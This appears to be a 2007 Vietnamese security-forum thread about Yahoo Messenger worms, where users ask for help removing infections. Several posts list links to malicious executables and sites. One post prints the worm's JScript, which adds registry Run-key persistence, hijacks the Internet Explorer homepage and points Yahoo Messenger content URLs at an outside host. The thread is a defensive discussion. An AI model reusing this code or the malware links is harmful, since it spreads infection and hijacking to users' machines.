Virus Yahoo!M - .:: HVAOnline ::.

English | Vietnamese

Rules

Main Forum

Portal

Member Listing

Statistics

Search

Reading Room
[Register]

Login [ | https ]

Forum Index

Thảo luận virus, trojan, spyware, worm...

Virus Yahoo!M

[Question] Virus Yahoo!M	13/04/2007 07:38:34 (+0700) \| #1 \| 53357

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

http://dungcoivb.googlepages.com/Fun.exe

Các bạn đừng bấm vào link này. Đó là virus.

Một số bạn bè tôi đang bị con virus này, tôi muốn hỏi thông tin:
a) Làm sao để diệt con virus này?
b) Làm sao để chống sự lây lan của nó? Hoặc làm cách nào để chặn ngay từ host của nó (ví dụ, contact với google?)

Chúc vui

[Question] Re: Virus Yahoo!M	13/04/2007 10:15:54 (+0700) \| #2 \| 53372

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

Mình nghĩ vấn đề virus trên YM đối với VN là một vấn đề rất lớn, và rất cần được mọi người quan tâm. Rất mong sự ra sức của HVA trong việc này.

Chúc vui

[Question] Virus Yahoo!M	13/04/2007 10:39:42 (+0700) \| #3 \| 53381

boyone.love
Member

Joined: 19/01/2007 18:47:55
Messages: 24
Offline

link del rồi có chạy đc đâu, định tải về chạy chơi thử smilie

chán thiệt, đưa link lại đi để tui thử con jì(liều cái)

[Question] Virus Yahoo!M	13/04/2007 10:54:08 (+0700) \| #4 \| 53389

tmd
Member

Joined: 28/06/2006 03:39:48
Messages: 2951
Offline

http://dungcoivb.googlepages.com/Fun.exe

Một anh Việt Nam viết virus muốn ra ngoài thế giới. Không biết anh đi tới đâu, nhưng tui biết chắc là ko có tận thế. smilie

)

3 giai đoạn của con... người, ban đầu dek biết gì thì phải thăm dò, sau đó biết rồi thì phải thân thiết, sau cùng khi quá thân thiết rồi thì phải tình thương mến thương. Nhưng mà không thương được thì ...

[Question] Re: Virus Yahoo!M	13/04/2007 12:51:19 (+0700) \| #5 \| 53414

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

Mình không rõ, nhưng mà cái này bạn mình bị dính rồi, nhưng không biết làm sao để sửa? Diệt?

Nếu có thể giúp cách giải quyết nó thì rất tốt.

Nếu gặp thêm các virus kiểu như thế này, mình sẽ gửi link vào trong luồng này để tổng hợp và nhờ HVA tìm cách diệt.

Chân thành cảm ơn
Chúc vui

[Question] Re: Virus Yahoo!M	14/04/2007 05:58:49 (+0700) \| #6 \| 53512

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

http://nhatquanglan8.0catch.com

Một đồng chí nữa

[Question] Re: Virus Yahoo!M	15/04/2007 01:03:30 (+0700) \| #7 \| 53696

hacker_club
Member

Joined: 11/04/2007 10:11:51
Messages: 26
Location: Vinh - NghênAn
Offline

Con virus do thi moi nguoi dung AVG 7.5 upload phien ban moi cua no ma diet ? Minh thuong xuyen online nen luc nao cung gap con nay , thang AVg no diet cung manh lam do.
Link:http://www.grisoft.com/doc/31/us/crp/0

[Question] Virus Yahoo!M	15/04/2007 01:09:04 (+0700) \| #8 \| 53701

mystery_hacker
Member

Joined: 30/06/2006 16:16:03
Messages: 365
Location: Khánh Hòa
Offline

Theo mình biết là mấy con worm do anh Dungcoi viết thì có thể gỡ bỏ bằng chính chương trình do ảnh viết là Remove Dungcoi.

[Question] Virus Yahoo!M	15/04/2007 11:36:40 (+0700) \| #9 \| 53816

MH
Member

Joined: 15/04/2007 00:16:17
Messages: 10
Offline

http://koolbaby.on.to/who.jpg

Máy tôi dính cái đó.. Tôi dùng BitDefender 9.0 mà ko scan nổi sao smilie

(

Nhân tiện mọi người cho tôi hỏi: mấy hôm nay máy tôi khi bật IE lên thì nó đơ luôn, phải 2,3 phút sau nó mới load xong cái home page smilie

Sau đó thì mọi chuyện lại bình thường. Vậy là làm sao và cách giải quyết thế nào? smilie

Mọi người giúp tôi với!

Rồi từ khi dính con virus kia thì nó tự set homepage của tôi là http://koolbaby.on.to .. Hic,bây h ko đổi lại được,phải làm sao đây?

Xin mọi người giúp đỡ tôi với! Thx!

[Question] Virus Yahoo!M	16/04/2007 00:23:52 (+0700) \| #10 \| 53895

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

mystery_hacker wrote:

Theo mình biết là mấy con worm do anh Dungcoi viết thì có thể gỡ bỏ bằng chính chương trình do ảnh viết là Remove Dungcoi.

http://diendan.vietnamnet.vn/message_view.asp?forumid=53&msgid=20061218153515275766

Hình như bạn đề cập đến đồng chí này thì phải.

Cám ơn.

[Question] Re: Virus Yahoo!M	16/04/2007 02:13:13 (+0700) \| #11 \| 53915

Ghost Ship
Member

Joined: 21/03/2007 12:10:46
Messages: 467
Location: Đáy biển
Offline

http://diendan.vietnamnet.vn/message_view.asp?forumid=53&msgid=20061218153515275766

Nghe về ông này đã lâu, giờ mới thấy tận nơi, đúng là những thứ mình biết còn quá ít smilie

)

[Question] Virus Yahoo!M	17/04/2007 04:16:52 (+0700) \| #12 \| 54115

buixuankha
Member

Joined: 18/03/2007 14:22:07
Messages: 3
Offline

thăgnf nhóc nữa nè , Diệt nó thế nào đây ? máy em bị nhiễm nó ,anh chi nao biet cach diet no thi` giup em với http://nhatquanglan6.t35.com Thanks

[Question] Re: Virus Yahoo!M	17/04/2007 05:35:19 (+0700) \| #13 \| 54129

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

http://tintucgiatgan.110mb.com

Lên tiếp một đồng chí nữa cho anh em ngâm cứu đây.

Chúc vui

[Question] Re: Virus Yahoo!M	06/05/2007 11:17:33 (+0700) \| #14 \| 57426

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

http://thecoolpics.net/dontclick.jpg

Thêm một chú nữa.

[Question] Re: Virus Yahoo!M	08/05/2007 05:04:55 (+0700) \| #15 \| 57702

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

http://www.freewebtown.com/tintucgiatgan/index.html

Thêm một chú nữa đây, anh em HVA ra tay đi...

[Question] Re: Virus Yahoo!M	08/05/2007 05:20:10 (+0700) \| #16 \| 57706

vuhoangsons
Member

Joined: 23/04/2007 19:35:50
Messages: 3
Offline

hacker_club wrote:

Con virus do thi moi nguoi dung AVG 7.5 upload phien ban moi cua no ma diet ? Minh thuong xuyen online nen luc nao cung gap con nay , thang AVg no diet cung manh lam do.
Link:http://www.grisoft.com/doc/31/us/crp/0

anh oi trang wed cua anh dai roi khong con hoat dong nua thu lai coi.
Anh thu dung kaspersky thu xem em cung dang thu no cung tot lam chuc anh thanh cong nhe.hi hi

[Question] Virus Yahoo!M	08/05/2007 12:28:26 (+0700) \| #17 \| 57784

nhatminh1209
Member

Joined: 25/01/2005 08:55:11
Messages: 102
Offline

Cụ thể là các bác vào một số trang xong bị nhiễm virus. (mấy bác nhà ta cũng có bác rất nhanh, chẳng bít search ở đâu mà đã khai thác *.ani rồi)
Một số con hiện nay sẽ ghi vào trong C:\Windows\system32\boot.js
và một số file Win.exe và WinSit.exe
Để diệt thì các bác cần xóa cái file boot.js đi, vào regedit xóa các đường dẫn đến đó đi (cụ thể hiện nay chính là trang web www.keditimmong.kiss.to
Nó sẽ ghi vào regedit một loạt các value mới:

var url = "http://keditimmong.kiss.to";
var burl = "http://keditimmong.kiss.to";
var fso = new ActiveXObject("Scripting.FileSystemObject");
var tfolder = fso.GetSpecialFolder(0);
var filepath = tfolder + "\\system32\\boot.js";
var Shell = new ActiveXObject("WScript.Shell");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\Windows",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\System32",filepath);
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url1","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url2","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url3","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url4","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url5","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url7","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url8","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url10","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\TypedURLs\\url11","http://keditimmong.kiss.to");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Calendar\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_buzz\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_et\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Headline\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Overview\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Sport\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Stock\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Yahoo360\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Games\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Launchcast\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");
Shell.RegWrite("HKCU\\Software\\Yahoo\\Pager\\View\\YMSGR_Weather\\content url","http://sky.geocities.jp/toantran1001_k8/toantrantrangchinh/welcomtokdtm.txt");

Để chặn mấy kái kiểu này các bác nhớ cài cho máy phần mềm nào chống ghi vào regedit ấy, nó sẽ báo ngay, và nhớ update cho cái win của các bác.

[Question] Re: Virus Yahoo!M	09/05/2007 07:22:30 (+0700) \| #18 \| 57935

falleaf
Member

Joined: 05/03/2007 22:39:30
Messages: 11
Offline

http://nhatquanglan6.t35.com

Có thể giải thích các bước tuần tự cụ thể, và chỉ rõ phần mềm nào an toàn cho người dùng? Vì F là người không biết bì về virus cả, nên rất cần các anh em giúp đỡ.

[Question] Re: Virus Yahoo!M	10/05/2007 12:13:35 (+0700) \| #19 \| 58187

nhatminh1209
Member

Joined: 25/01/2005 08:55:11
Messages: 102
Offline

falleaf wrote:

http://nhatquanglan6.t35.com

Có thể giải thích các bước tuần tự cụ thể, và chỉ rõ phần mềm nào an toàn cho người dùng? Vì F là người không biết bì về virus cả, nên rất cần các anh em giúp đỡ.

Hiện tại tớ đang dùng Window Defender, nó chạy khá tốt. Để an toàn, bác nên cài thêm PM chống spy, adware bên cạnh antivirus. Tuy vậy, đó vẫn chưa hoàn toàn là cách hữu hiệu nhất để chống bạn bị nhiễm virus.
Cách tốt nhất để chống bị nhiễm virus Y!M là không nên mở những trang web lạ, xuất xứ không rõ ràng. Bạn của bạn gửi bạn 1 trang web thì phải confirm lại chắc chắn đó là do họ gửi

Go to:

Users currently in here
1 Anonymous